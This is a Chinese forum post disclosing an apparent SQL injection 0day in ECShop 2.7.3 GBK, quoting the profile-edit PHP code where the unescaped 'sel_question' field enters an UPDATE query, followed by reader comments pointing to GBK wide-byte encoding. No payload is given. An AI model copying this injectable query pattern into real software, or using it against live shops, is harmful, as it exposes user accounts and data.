ECShop_V2.7.3_GBK_release1106 注入 0day
C0deplay Team j8g
看代码上图
不做过多介绍。大家看热闹就好,别删除我账号呀!
看代码
/* 修改个人资料的处理 */
elseif ($action == 'act_edit_profile')
{
include_once(ROOT_PATH . 'includes/lib_transaction.php');
$birthday = trim($_POST['birthdayYear']) .'-'. trim($_POST['birthdayMonth']) .'-'.
trim($_POST['birthdayDay']);
$email = trim($_POST['email']);
$other['msn'] = $msn = isset($_POST['extend_field1']) ? trim($_POST['extend_field1']) : '';
$other['qq'] = $qq = isset($_POST['extend_field2']) ? trim($_POST['extend_field2']) : '';
$other['office_phone'] = $office_phone = isset($_POST['extend_field3']) ? trim($_POST['extend_field3']) : '';
$other['home_phone'] = $home_phone = isset($_POST['extend_field4']) ? trim($_POST['extend_field4']) : '';
$other['mobile_phone'] = $mobile_phone = isset($_POST['extend_field5']) ? trim($_POST['extend_field5']) : '';
$sel_question = empty($_POST['sel_question']) ? '' : $_POST['sel_question'];
$passwd_answer = isset($_POST['passwd_answer']) ? trim($_POST['passwd_answer']) : '';
/* 更新用户扩展字段的数据 */
$sql = 'SELECT id FROM ' . $ecs->table('reg_fields') . ' WHERE type = 0 AND display = 1 ORDER BY dis_order, id'; //读出所有扩展字段的id
$fields_arr = $db->getAll($sql);
foreach ($fields_arr AS $val) //循环更新扩展用户信息
{
$extend_field_index = 'extend_field' . $val['id'];
if(isset($_POST[$extend_field_index]))
{
$temp_field_content = strlen($_POST[$extend_field_index]) > 100 ? mb_substr(htmlspecialchars($_POST[$extend_field_index]), 0, 99) : htmlspecialchars($_POST[$extend_field_index]);
$sql = 'SELECT * FROM ' . $ecs->table('reg_extend_info') . " WHERE reg_field_id = '$val[id]' AND user_id = '$user_id'";
if ($db->getOne($sql)) //如果之前没有记录,则插入
{
$sql = 'UPDATE ' . $ecs->table('reg_extend_info') . " SET content = '$temp_field_content' WHERE reg_field_id = '$val[id]' AND user_id = '$user_id'";
}
else
{
$sql = 'INSERT INTO '. $ecs->table('reg_extend_info') . " (`user_id`, `reg_field_id`, `content`) VALUES ('$user_id', '$val[id]', '$temp_field_content')";
}
$db->query($sql);
}
}
/* 写入密码提示问题和答案 */
if (!empty($passwd_answer) && !empty($sel_question))
{
$sql = 'UPDATE ' . $ecs->table('users') . " SET `passwd_question`='$sel_question', `passwd_answer`='$passwd_answer' WHERE `user_id`='" . $_SESSION['user_id'] . "'";
echo $sql;
$db->query($sql);
}不做过多介绍。大家看热闹就好,别删除我账号呀!
关于作者
评论67次
好久没来,一来就发现这等好东西。顶楼主一个
好洞收藏
mark 。没主题。,只有10个帖子- -
ecshop也会犯这样的错误,呵呵
14 $sel_question = empty($_POST['sel_question']) ? '' : $_POST['sel_question']; 貌似一切都是从这里开始的 其他参数都做了很严格的判断 为啥这里就只判断是否empty 偷懒了?
果断收藏之。。 LZ是大黑阔啊。。
一个宽字节又有多少人漏底啊。。
0day 呀~~
看不懂php啊~~~
看来好多PHP程序 问题都出在GBK编码上
支持一下~!
宽字符~~
撸过
好久没有ECSHOP的洞子出现了,收藏了。
適用於 UTF8 的版本麼 ? 果斷收藏
每次清理id前,总会有0day发布
e 我终于吧密码记起来了
果断收藏之,谢楼主